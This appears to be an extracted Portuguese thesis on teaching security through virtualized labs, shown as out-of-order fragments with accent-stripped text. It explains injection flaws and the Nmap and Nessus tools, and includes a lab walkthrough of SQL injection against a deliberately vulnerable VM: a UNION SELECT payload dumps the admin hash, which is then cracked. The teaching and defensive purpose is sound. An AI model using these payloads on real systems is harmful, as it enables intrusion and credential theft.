131. strando o cen rio atual as diferentes categorias de problemas encontrados e fundamentando as propriedades e mecanismos de seguran a computacional O terceiro cap tulo apresenta os principais problemas de inje o encontrados em aplica es web 16 fazendo uma an lise de cada um deles O quarto cap tulo apresenta algumas das principais ferramentas para an lise da seguran a computacional O quinto cap tulo aborda o uso de virtualiza o no ensino de seguran a e alguns trabalhos relacionados na rea O sexto cap tulo traz roteiros laboratoriais para testes em ambientes virtualizados preparados exclusivamente para este fim O s timo cap tulo apresenta as considera es finais do trabalho e trabalhos futuros que podem ser realizados Para finalizar o trabalho apresenta as refer ncias bibliogr ficas utilizadas durante o desenvolvimento 17 2 CONCEITOS B SICOS DE SEGURAN A COMPUTACIONAL 2 1 Cen rio atual da seguran a Nos dias de hoje a seguran a computacional torna se cada vez mais importante e necess ria Um computador est seguro se este est livre de amea as entretanto nem sempre poss vel manter um computador sempre seguro visto que o n mero de computadores conectados a algum tipo de rede tem aumentado nos ltimos tempos Apesar de este n o ser o nico fator contribuinte para trazer amea as ao computador atualmente uma porta muito grande para a entrada de problemas caso algumas medidas de se
132. t Space required 55 5MB Figura 9 Componentes de instalac o do NMAP 79 Para este roteiro iremos utilizar maquinas virtuais com ambos os sistemas operacionais na rede Ubuntu e Windows XP e para realizar as varreduras iremos utilizar a interface gr fica Zenmap a qual muito similar tanto no Linux quanto no Windows e para alguns casos o terminal de comandos do Ubuntu Ambos ambientes virtuais Ubuntu e Windows XP encontram se propositalmente com algumas portas abertas para que possamos varr las e detect las em nossos testes Tarefa 1 A descoberta de hosts Antes de iniciarmos a nossa varredura preciso definir o nosso alvo Como vimos na se o 4 1 do Nmap poss vel varrer um host individualmente ou uma rede inteira Situa o 1 Suponha que voc conhe a o endere o IP do alvo que deseja varrer em sua rede Este endere o IP 192 168 6 2 Nesta situa o vamos disparar uma varredura diretamente contra o alvo espec fico 192 168 6 2 Por enquanto n o vamos nos preocupar com as op es de varredura 1 Realize a varredura simplesmente digitando o endere o alvo no campo Alvo da interface Zenmap A figura 10 mostra o resultado da nossa varredura 80 Scan Tools Perfil Ajuda Alvo 192 168 6 2 Perfil Intense scan Comando T4 A v 192 168 6 2 Sa da do Nmap Ports Hosts Topology Detalhes da Maquina Scans T4 A v 192 168 6 2 OS
133. te importante do ponto de vista did tico pois facilita ao aluno o entendimento do manuseio das diferentes ferramentas utilizadas permitindo o focar no problema que est sendo resolvido ou no teste que est sendo realizado A metodologia utilizada para construir os roteiros baseou se em t cnicas para testar diretamente o problema envolvido fazendo uma reflex o sobre os motivos que nos levaram a realizar a tarefa de tal maneira Desta forma o aluno compreende o problema passando por uma linha de racioc nio l gico para atingir os objetivos 7 1 Trabalhos futuros O uso da virtualiza o no ensino de seguran a tem crescido e ganhado destaque entre as diferentes metodologias de ensino de seguran a Este cen rio indica que o assunto ainda ganha for a no campo de pesquisa e que v rios trabalhos ainda podem ser realizados neste campo Como forma de continuar este trabalho outros roteiros de problemas e ou ferramentas distintas podem ser desenvolvidos utilizando como base mesmo ambiente virtual A pesquisa de outros problemas de seguran a e de novas ferramentas de an lise e gest o de seguran a podem ser incorporadas a este trabalho de forma iterativa 128 Ha ainda a possibilidade do desenvolvimento de novas metodologias utilizando a virtualiza o como pe a fundamental para o ensino de seguran a como mostram alguns trabalhos relacionados na se o 5 8 Refer ncias bibliogr ficas ACKER Bernard Van BACKER Kar
134. tender as necessidades estrat gicas da rede ou sistema pois caso a tecnologia utilizada n o tenha boa qualidade ou mesmo n o seja suficiente para atender tais necessidades uma falsa sensa o de seguran a pode ser criada Este fato configura um cen rio ainda pior no qual as pessoas passam a se utilizar dos recursos da rede ou sistema acreditando estarem seguras quando na verdade est o vulner veis 2 5 Mecanismos e t cnicas de seguran a Segundo a defini o de Bishop 2004 p 7 um mecanismo de seguran a um m todo ferramenta ou procedimento para refor ar a pol tica de seguran a Mecanismos de seguran a podem algumas vezes n o serem t cnicos como por exemplo a exig ncia de uma prova f sica de identidade para a troca de uma senha s vezes a pol tica de seguran a pode interferir com exig ncias de forma a tornar alguns mecanismos n o t cnicos BISHOP 2004 p 7 2 5 1 Criptografia Knudsen 1998 p 6 define criptografia como a ci ncia da escrita secreta Para Nakamura e Geus 2007 p 301 criptografia A ci ncia de manter as mensagens seguras 35 A criptografia tem um papel fundamental na seguran a da informa o pois serve de base para muitas outras tecnologias e protocolos tais como a infra estrutura de chaves p blicas Propriedades da criptografia como o sigilo a integridade autentica o e o n o rep dio garantem o funcionamento de opera es
135. tindo experimentar novas ferramentas e testar isoladamente as situa es em estudo Os resultados esperados nos roteiros tamb m auxiliam no entendimento do problema de forma que fornecem uma garantia de que o indiv duo realmente realizou o teste ou experimento com sucesso SUMARIO AGRADECIMENTOS J J I u u u uu 4 SS um Q Qa Gu aaa u aQ Sa 5 SUM RIO coti c ect m aaa kas kupu Ia Sanm 6 LISTA DE ABREVIATURAS E SIGLAS 8 LISTA DE FIRURASL IL a 10 LISTA DE TABELAS I U U U U U uuu u 12 T INTRODUGAQO C 13 MOTIVA O dent du E TE 13 1 2 DESCRI O DO PROBLEMA 14 1 3 ede 15 14 2 OBJETIVOS ESPECIFICOS eet na t m antec 15 1 5 ESTRUTURA DO TRABALHO 1 hd to diodo 15 2 CONCEITOS B SICOS DE SEGURAN A COMPUTACIONAL eren tentent 17 2 1 CEN RIO ATUAL DA SEGURAN A a iii a aa 17 2 2 CATEGORIAS DE PROBLEMAS 23 2 2
136. tivas Tarefa 2 Obter dados do banco de dados do servidor como o usu rio e senha do administrador Utilizaremos o mesmo endere o da tarefa anterior para acessar o servidor da maquina virtual LAMPSecurity CTF6 que neste roteiro seguir http 192 168 6 135 Neste servidor os posts dos usuarios s o armazenados e acessados individualmente atrav s de um identificador 1 Atrav s do Mantra acesse o endere o http 192 168 6 135 id 01 alterando o endere o IP para o endere o alocado em sua rede 2 Caso voc n o visualize nenhum post altere o n mero do id para 02 03 04 at encontrar um post Agora vamos testar se o servidor est fazendo alguma verifica o nos endere os digitados pelos usu rios adicionando um ap strofe ao final do endere o 3 Adicione um ap strofe ao final do endere o para testar se alguma verifica o est sendo feita Ex http 192 168 6 135 id 01 112 Podemos notar que a pagina exibida mudou mas nenhum erro como o 404 de pagina nao encontrada foi exibido Isso significa que nenhuma verifica o esta sendo feita nos endere os HTTP digitados pelos usu rios no navegador 4 Na barra lateral do Mantra clique no cone com uma bola verde para exibir a hackbar a qual utilizaremos para executar alguns testes como mostrado na figura 37 lt fay 192 168 6 135 id 01 Disable ALcookes csse Forms Information S Miscellaneous p Outlin
137. uais em uma nica m quina f sica com cada VM compartilhando os recursos desse computador f sico em v rios ambientes M quinas virtuais diferentes conseguem executar sistemas operacionais diferentes e v rios aplicativos no mesmo computador f sico De acordo com Laureano e Maziero 2008 p 6 diferentes processadores possuem diferentes conjuntos de instru es o que faz com que cada arquitetura necessite de um software diferente capaz de interpretar suas instru es por este motivo que n o poss vel executar em um processador Intel AMD uma aplica o compilada para um processador ARM As instru es em linguagem de m quina escritas para o processador ARM n o ser o compreendidas pelo processador Intel AMD Similarmente n o poss vel executar em Linux uma aplica o escrita para Windows pois as chamadas de sistema s o diferentes para os dois sistemas operacionais Uma solu o para eliminar essa depend ncia seria mapear uma interface para outra com a introdu o de uma camada intermedi ria de adapta o Esse 68 mapeamento a base da virtualiza o e foi introduzido por interm dio do conceito de isomorfismo Popek Goldberg 1974 O isomorfismo consiste em transformar o estado de um sistema A em um sistema B OLIVEIRA CARISSIMI TOSCANI 2010 p 297 Um computador composto por duas grandes camadas a de hardware e a de software que por sua vez s o divididas em subcamadas OLIVEIRA CARIS
138. uanto que um ataque SQL Injection tem como alvo o banco de dados de um servidor Causas de um ataque XSS A OWASP B 2011 define 2 situa es nas quais ataques de Cross Site Scripting podem ocorrer 48 e Dados entram em uma aplica o web atrav s de uma fonte n o confi vel Frequentemente uma requisi o web e O dado est incluso em um conte do din mico que enviado por um usu rio da web sem ser validado previamente e verificada a exist ncia de c digo malicioso De modo geral para a OWASP B 2011 ataques de Cross Site Scripting tamb m ocorrem quando um atacante usa uma aplica o web para enviar c digo malicioso que geralmente executa no browser de diversos usu rios diferentes Falhas que permitem o sucesso desses ataques s o comuns e ocorrem em qualquer ambiente que utilize uma aplica o web a qual requeira uma entrada do usu rio e utilize essa entrada na sa da gerada pela aplica o sem antes validar e ou codificar a entrada do usu rio A figura 6 mostra um poss vel cen rio pass vel de ataque XSS no qual a aplica o utiliza dados n o confi veis na constru o da p gina HTML sem valida o ou escape de caracteres String page input name creditcard type TEXT value request getParameter CC 5 Figura 6 Cen rio pass vel de ataque XSS OWASP E 2012 O atacante pode modificar o par metro CC no browser para o conte do mostrado na figura 7 Figura
139. ue acontecer Como saber se voc est vulner vel e como se proteger Se voc o dono da aplica o nunca confie em conte dos digitados por usu rios e sempre filtre metadados Essa pr tica ir eliminar a maior parte de ataques XSS Se voc um usu rio final a maneira mais f cil de se proteger seguir apenas links encontrados dentro da p gina oficial que voc deseja visitar Se voc estiver lendo uma mensagem e a mensagem contiver um link para um web site conhecido prefira digitar voc mesmo o endere o em seu navegador ao inv s de clicar no link para 51 acessar a pagina Isso provavelmente ira eliminar 90 dos riscos de voc ser vitima de um ataque XSS As vezes c digos maliciosos podem ser executados simplesmente ao abrir um e mail Se voc desconhece o remetente seja cuidadoso ao abri lo Uma outra op o para se proteger de ataques XSS desabilitar a execu o de JavaScript em seu navegador por m esta estrat gia pode prejudicar a sua navega o em sites que utilizam JavaScript CGI Security 2012 4 Ferramentas de an lise de seguran a 4 1 Scanner de Rede NMAP Varredura de Portas A varredura de portas o processo de se conectar a portas TCP e UDP com o prop sito de encontrar quais servi os e aplica es est o dispon veis no dispositivo alvo GREGG 2008 p 111 Este tipo de pr tica pode ser utilizada tanto para fins de auditoria de seguran a da rede ajudando os administradores
140. ulnerabilidade como podemos observar na figura 3 OWASP C 2011 Threat Attack Security Security Technical Business Agents Vectors Weaknesses Controls Impacts Impacts D an TP 169 Weakness E Weakness Weakness Control6 Control gt to gt rt pt 22 Figura 3 Esquema relacionando ameagas ataques vulnerabilidades OWASP 2011 Como vis o geral da origem das amea as podemos conferir os dados da Symantec 2011 como mostra a tabela 1 na qual o Brasil ocupa consecutivamente o 4 lugar em ranking de amea as em 2009 e 2010 25 United States 1 19 1 20 China 2 16 2 9 Germany 3 5 5 5 Brazil 4 4 4 5 United Kingdom 5 4 3 6 India 6 4 7 3 South Korea 7 4 9 3 Italy 8 3 10 3 Taiwan 9 3 6 4 Russia 10 2 8 3 Tabela 1 Atividade maliciosa por fonte ranking panor mico 2009 2010 SYMANTEC 2011 2 2 2 Vulnerabilidades Landwehr 2001 p 5 define uma vulnerabilidade como um ponto fraco em um sistema de computador Essa vulnerabilidade pode ser entre outras coisas uma falha em um peda o de software que roda com privil gios de super usu rio uma senha fraca ou de f cil adivinha o uma regra mal configurada em um firewall ou at mesmo a depend ncia de um servi o ou parte de uma informa o externa ao sistema LANDWEHR 2001 p 5 26 Para Shirey 2000 p 189 a defini o de uma vulner
141. veis na maquina do usuario como espaco de armazenamento mem ria RAM capacidade de processamento poss vel que diversos destes programas emulem sistemas virtuais ao mesmo tempo de forma independente sem que um interfira no funcionamento do outro Sistemas virtuais de modo geral emulam a maior parte dos recursos de hardware necessitados pelos sistemas operacionais para o seu funcionamento O computador f sico que est hospedando uma m quina virtual dedica parte dos seus recursos de hardware ao funcionamento do sistema virtual O disco r gido de uma m quina virtual nada mais do que um grande arquivo na m quina hospedeira Outros recursos como processamento e mem ria RAM da m quina virtual tamb m s o compartilhados da m quina hospedeira 5 2 A aplica o de virtualiza o no ensino de seguran a De acordo com Nance Hay Dodge Seazzu e Burd 2009 p 4 A virtualiza o nos permite a emula o de uma rede inteira de computadores e dos softwares neles instalados em uma nica m quina f sica Os computadores virtuais ou m quinas virtuais funcionam e se comportam exatamente como se estivessem executando em um hardware real em uma m quina f sica M quinas virtuais podem ser configuradas para se conectarem a outras redes virtuais isoladas de modo a nos permitirem a execu o de testes de seguran a em redes emuladas sem comprometer e afetar desempenho de uma rede real Segundo Gregg 2009 p 48 o uso de uma ma
142. velit ac lorem fringilla dapibus sit amet vitae leo Mauris non velit eu neque auctor dignissim Nam quis ipsum ac lectus commodo adipiscing interdum placerat mi admin Posted by 7 25e4ee4e9229397b6b17776bfceaf8e7 image Figura 40 Visualiza o da p gina alvo ap s inje o de c digo SQL A senha est criptografada e portanto precisaremos decifr la 116 Vamos supor que a senha foi criptografada utilizando o MD5 que um padr o muito comum na criptografia de senhas 13 Para tentarmos decifrar a senha utilizando copie e cole na hackbar a senha criptografada selecione a senha e em seguida clique em Encryption gt MD5 Menu gt Send to gt md5 rednoize com como mostra a figura 41 e may O 192 168 6 135 7id 01 UNION SELECT 1 user username user password 4 5 6 7 from user Disable A cookies Z 55 Forms E images information Ed Miscellaneous P 4 Outline 1 Resizer tools gt View Source INT SQL XSS Encryption Other Load URL 25 4 4 9229 MDS Menu MDS Hash 5 1 Menu SHA 256 Rori3 Send to Y split URL md5 rednoize com Send to http md5 rednoize com b Execute Enable Post data Enable Referrer Figura 41 Caminho para decifrar uma senha na hackbar Voc ver que a senha foi decifrada e ela adminpass Para finalizar vamos testar o acesso com o nome de usu rio e senha qu
143. vulnerabilidade listados de forma geral podemos evitar ataques de inje o SQL dedicando aten o a estes pontos e desenvolvendo aplica es preparadas para evitar estes problemas Abaixo est o listadas algumas recomenda es de Clarke 2009 p 373 e Use instru es parametrizadas o Use instru es parametrizadas ao inv s de SQL din mico na constru o de requisi es SQL 45 o Use instru es parametrizadas somente quando voc est fornecendo dados voc n o pode utiliz las para fornecer palavras chaves SQL ou identificadores como nomes de tabelas ou colunas e Valide as entradas o Sempre utilize valida o de entrada do tipo White list aceitando somente entradas esperadas onde puder o Certifique se de ter validado o tipo tamanho intervalo e conte do de todas as entradas controladas por usu rio na aplica o o Utilize valida o de entrada do tipo Black list aceitando tudo exceto entradas contidas na Black list somente quando voc n o puder utilizar valida o de entrada do tipo White list o Nunca utilize apenas Black list Ao menos combine a com codifica o de sa da ou outra valida o e Codifique a sa da o Certifique se de que requisi es SQL contendo entradas controladas por usu rio s o codificadas corretamente para prevenir que caracteres especiais alterem a requisi o o Se voc est utilizando cl usulas do tipo LIKE certifique se de que os curingas
144. xar o campo Port Scan Range em default pois se a rede externa for muito grande a varredura poder levar muito tempo para terminar e gastar muito tempo a procura de portas pouco 99 provaveis de serem utilizadas o Nessus ira varrer aproximadamente 4 790 portas comuns 7 Na rea Performance deixaremos as configura es padr es 8 N o iremos utilizar credenciais portanto passemos para o submenu Plugins para escolhermos quais plugins o Nessus ir utilizar para detectar poss veis vulnerabilidades 9 Como vamos varrer diferentes redes externas n o sabemos exatamente que tipos de sistemas operacionais os hosts da rede poder o estar executando e portanto deixaremos habilitados todos os plugins Como marcamos a op o Safe Checks o Nessus ir automaticamente desabilitar plugins que podem ser danosos para a rede de modo que n o precisaremos desmarc los aqui 10 Por fim clique em Next depois Submit para salvar a nova pol tica Tarefa 2 Realizar a varredura Para acessar a tela de varreduras clique no menu superior Scans 1 Clique em Add e preencha os campos com os seguintes valores a Name Varredura de Rede Virtual 1 b Type Run Now c Policy Rede Virtual d Scan Targets 192 168 6 1 24 2 Em seguida clique em Launch Scan para dar in cio a varredura na rede virtual interna 3 Realize o mesmo procedimento para realizar uma varredura em uma rede externa preenche
Download Pdf Manuals
Related Search
Related Contents
Pyle Amplifiers User Manual Whirlpool ACQ058MM0 User's Manual 操作説明書 - 近代セールス社 Dexim DFU012 FM transmitter Philips 5500 series Smart LED TV 32PFL5507H Bedienungsanleitung エアファンネル (MIKUNI TMR/TDMR32 シングル)取扱説明書 エア GAS 50 Professional - Ferramenta L`Utensile Whitehaus Collection WH1313-PSS Installation Guide Copyright © All rights reserved.
Failed to retrieve file